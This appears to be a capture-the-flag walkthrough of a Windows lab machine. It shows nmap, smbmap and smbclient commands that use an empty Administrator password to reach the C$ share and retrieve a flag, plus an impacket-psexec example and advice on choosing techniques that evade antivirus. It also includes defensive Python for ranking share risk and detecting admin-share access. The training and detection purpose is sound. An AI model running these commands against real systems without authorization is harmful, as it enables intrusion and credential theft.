⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Tactics escalates the SMB knowledge from Dancing into a full Windows compromise. Here the Administrator account has no password set on a Windows host — but rather than just browsing shares, the attack reaches the C$ administrative share directly and ultimately leverages SMB to read the flag from the Administrator's desktop. This machine reinforces why administrator-level SMB access is a complete system compromise on Windows.

Tools: nmap · smbclient · smbmap  ·  Difficulty: Very Easy  ·  OS: Windows
01 — What You Will Learn
| Skill | Why it matters |
|---|---|
| Enumerating SMB with smbmap | smbmap shows share permissions at a glance, faster than smbclient for initial recon |
| Accessing the C$ administrative share | C$ gives full filesystem access when authenticated as admin, equivalent to local access |
| No-password Administrator on SMB | A Windows host with an empty admin password on SMB is a complete compromise |
| Navigating the Windows filesystem via SMB | Retrieving files from user desktops, AppData, and system paths via smbclient |
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Windows 10 Pro

Classic Windows SMB fingerprint — ports 135, 139, 445. The OS is Windows 10 Pro. No other ports open, so SMB is the entire attack surface.

03 — Share Enumeration with smbmap

smbmap is faster than smbclient for getting an overview of shares and their permissions. Try the Administrator account with an empty password first.

List shares and permissions
smbmap -H 10.129.x.x -u Administrator -p ""
Output
Disk    Permissions  Comment
----    -----------  -------
ADMIN$  READ, WRITE  Remote Admin
C$      READ, WRITE  Default share
IPC$    READ ONLY    Remote IPC

What you're seeing: READ, WRITE access to both ADMIN$ and C$ as Administrator with no password. This is a full system compromise — C$ maps directly to the root of the C drive.

⚠  Write access to C$ as Administrator means you can place executables anywhere on the system, modify the registry hive files, replace system binaries, and plant persistence mechanisms — all over SMB without ever getting a shell.
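The triage step above (section 03) and the smbmap-versus-smbclient comparison in section 05 both come down to reading one smbmap listing and deciding which shares matter. The following parser is an added example written for this page; it is not code from the original writeup or from the smbmap project. It assumes smbmap's default text layout (share name, then one of the permission strings NO ACCESS / READ ONLY / READ, WRITE / WRITE ONLY, then an optional comment) and works on a constructed sample that mirrors the output shown above, with one extra non-administrative share added to show the ranking.

```python
"""Parse an smbmap share listing and rank shares by risk for triage.

Added example for this writeup; not code from the original page or from
the smbmap project. The sample listing below is constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample mirroring the listing in section 03 (host is a placeholder).
SAMPLE_SMBMAP_OUTPUT = """
[+] IP: 10.129.x.x:445    Name: 10.129.x.x
        Disk          Permissions    Comment
        ----          -----------    -------
        ADMIN$        READ, WRITE    Remote Admin
        C$            READ, WRITE    Default share
        IPC$          READ ONLY      Remote IPC
        Public        READ ONLY      Team drop folder
"""

# One share per line: name, a permission string smbmap prints, optional comment.
SHARE_LINE = re.compile(
    r"^\s*(?P<share>\S+)\s+"
    r"(?P<perm>NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)"
    r"\s*(?P<comment>.*?)\s*$"
)

SEVERITY_ORDER = ("critical", "high", "medium", "low", "info")


@dataclass
class Share:
    name: str
    permissions: str
    comment: str

    @property
    def is_admin_share(self) -> bool:
        # ADMIN$ is %SystemRoot%; X$ is the root of drive X. IPC$ is the
        # named-pipe endpoint, not a filesystem share, so it is excluded.
        return (self.name.upper() == "ADMIN$"
                or re.fullmatch(r"[A-Za-z]\$", self.name) is not None)

    @property
    def writable(self) -> bool:
        return "WRITE" in self.permissions


def parse_smbmap(text: str) -> list[Share]:
    """Return the shares in smbmap's text output; banner and header rows never match."""
    shares = []
    for line in text.splitlines():
        m = SHARE_LINE.match(line)
        if m:
            shares.append(Share(m.group("share"), m.group("perm"), m.group("comment")))
    return shares


def assess(shares: list[Share]) -> list[tuple[str, str, str]]:
    """Map each share to (name, severity, reason), most severe first.

    A writable C$ or ADMIN$ is rated critical: as the writeup notes, that is
    full-disk access as Administrator, not just a browsable share.
    """
    findings = []
    for s in shares:
        if s.is_admin_share and s.writable:
            findings.append((s.name, "critical",
                             "writable administrative share: full filesystem access"))
        elif s.is_admin_share:
            findings.append((s.name, "high",
                             "readable administrative share: system files and profiles exposed"))
        elif s.writable:
            findings.append((s.name, "medium", "writable user share"))
        elif s.permissions == "NO ACCESS":
            findings.append((s.name, "info", "no access"))
        else:
            findings.append((s.name, "low", "read-only share"))
    return sorted(findings, key=lambda f: SEVERITY_ORDER.index(f[1]))


if __name__ == "__main__":
    for name, severity, reason in assess(parse_smbmap(SAMPLE_SMBMAP_OUTPUT)):
        print(f"{severity:8} {name:8} {reason}")
```

Feed it `smbmap -H <host> -u <user> -p '' > shares.txt` output (the empty `-p ""` is the same test the writeup runs) and the critical rows are the hosts to escalate first; on the defensive side the same ranking is a quick way to audit which accounts can reach administrative shares across a fleet.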
04 — Accessing C$ and Retrieving the Flag
Connect to the C$ share
smbclient \\\\10.129.x.x\\C$ -U Administrator --no-pass
Navigate to the Administrator desktop
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
  flag.txt    A    34
smb: \Users\Administrator\Desktop\> get flag.txt
smb: \Users\Administrator\Desktop\> exit
Read locally
cat flag.txt
✓ Submit the flag string to complete the machine.
05 — smbmap vs smbclient
| | smbmap | smbclient |
|---|---|---|
| Primary use | Quick permission overview across all shares | Interactive file access inside a share |
| Best for | Initial recon: "what can I access?" | Browsing, downloading, uploading files |
| Recursive listing | `smbmap -H host -u user -p pass -R` | `recurse ON` then `ls` |
| Download all files | `smbmap --download share/path` | `mget *` after `prompt OFF` |
| Empty password | `-p ""` | `--no-pass` or `-N` |
06 — Escalation: SMB → Remote Code Execution

With admin SMB write access, there are multiple paths to RCE without needing any additional vulnerability:

| Technique | Tool | Requirement |
|---|---|---|
| PsExec-style execution | impacket-psexec | Admin write to ADMIN$ or C$ |
| SMBExec | impacket-smbexec | Admin SMB access |
| WMIExec | impacket-wmiexec | Admin credentials + WMI enabled |
| Scheduled task creation | net use + schtasks | Write access to C$ |
| Service creation | sc.exe over SMB | Admin credentials |
Example: PsExec shell via impacket
impacket-psexec Administrator:@10.129.x.x
07 — Key Takeaways
Admin SMB access with no password is a complete Windows system compromise. C$ access equals physical access — every file, every credential store, every configuration is readable and writable.
| Concept | Real-world relevance |
|---|---|
| Empty admin password on SMB | Windows machines in workgroups or with default builds frequently have this; always test before brute-forcing |
| C$ is full disk access | SAM, SYSTEM, NTDS.dit: all credential stores are in reach via C$ with admin access |
| smbmap for speed | Gets permissions across all shares in one command, essential for fast triage |
| Admin access = multiple RCE paths | PsExec, SMBExec, WMIExec all work; pick the one that evades AV/EDR in the specific environment |
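The defensive counterpart to the takeaways above is noticing when an administrative share is reached over the network at all. The snippet below is an added example for this page, not code from the original writeup; it assumes the host records Security event 5140 ("A network share object was accessed", which needs the Audit File Share subcategory enabled) and that the events have been exported into dicts keyed by the standard field names. The events, IP addresses, user names and trusted-host list are all constructed placeholders.

```python
"""Flag access to C$ / ADMIN$ in Windows file-share audit events (event 5140).

Added example for this writeup; not code from the original page. Assumes
Security event 5140 is being logged and exported as dicts with the standard
field names. All sample data below is constructed.
"""
from collections import defaultdict

ADMIN_SHARES = {"C$", "ADMIN$"}

# Constructed allow-list: hosts expected to touch admin shares, such as a
# patch-management server. Adjust for the environment being monitored.
TRUSTED_SOURCES = {"10.0.0.5"}

# Constructed sample: two admin-share hits from one untrusted source, one
# expected hit from the trusted host, one ordinary share, and a non-5140 event.
SAMPLE_EVENTS = [
    {"EventID": 5140, "SubjectUserName": "Administrator", "IpAddress": "10.10.14.7",
     "ShareName": "\\\\*\\C$", "AccessMask": "0x1"},
    {"EventID": 5140, "SubjectUserName": "Administrator", "IpAddress": "10.10.14.7",
     "ShareName": "\\\\*\\ADMIN$", "AccessMask": "0x1"},
    {"EventID": 5140, "SubjectUserName": "svc_patch", "IpAddress": "10.0.0.5",
     "ShareName": "\\\\*\\ADMIN$", "AccessMask": "0x1"},
    {"EventID": 5140, "SubjectUserName": "alice", "IpAddress": "10.10.20.3",
     "ShareName": "\\\\*\\Public", "AccessMask": "0x1"},
    {"EventID": 4624, "SubjectUserName": "alice", "IpAddress": "10.10.20.3"},
]


def share_basename(share_name: str) -> str:
    """Reduce a ShareName such as \\\\*\\C$ to the bare share name C$."""
    return share_name.rsplit("\\", 1)[-1]


def find_admin_share_access(events, trusted=TRUSTED_SOURCES):
    """Return one alert per 5140 event that opens C$/ADMIN$ from an untrusted source."""
    alerts = []
    for e in events:
        if e.get("EventID") != 5140:
            continue
        share = share_basename(e.get("ShareName", ""))
        if share.upper() not in ADMIN_SHARES:
            continue
        src = e.get("IpAddress", "")
        if src in trusted:
            continue
        alerts.append({"source": src, "user": e.get("SubjectUserName"), "share": share})
    return alerts


def summarize_by_source(alerts):
    """Group alerts as {source_ip: [shares touched]} so a single host that
    walks both C$ and ADMIN$ (as in this writeup) surfaces as one finding."""
    touched = defaultdict(set)
    for a in alerts:
        touched[a["source"]].add(a["share"])
    return {src: sorted(shares) for src, shares in touched.items()}


if __name__ == "__main__":
    for src, shares in summarize_by_source(find_admin_share_access(SAMPLE_EVENTS)).items():
        print(f"{src} reached administrative shares: {', '.join(shares)}")
```

Event 5140 records the share but not how the session authenticated, so it will not by itself say that the password was empty; the control that closes that gap is the Windows policy "Accounts: Limit local account use of blank passwords to console logon only", which is enabled by default and, when left on, rejects exactly the network logon this machine relies on.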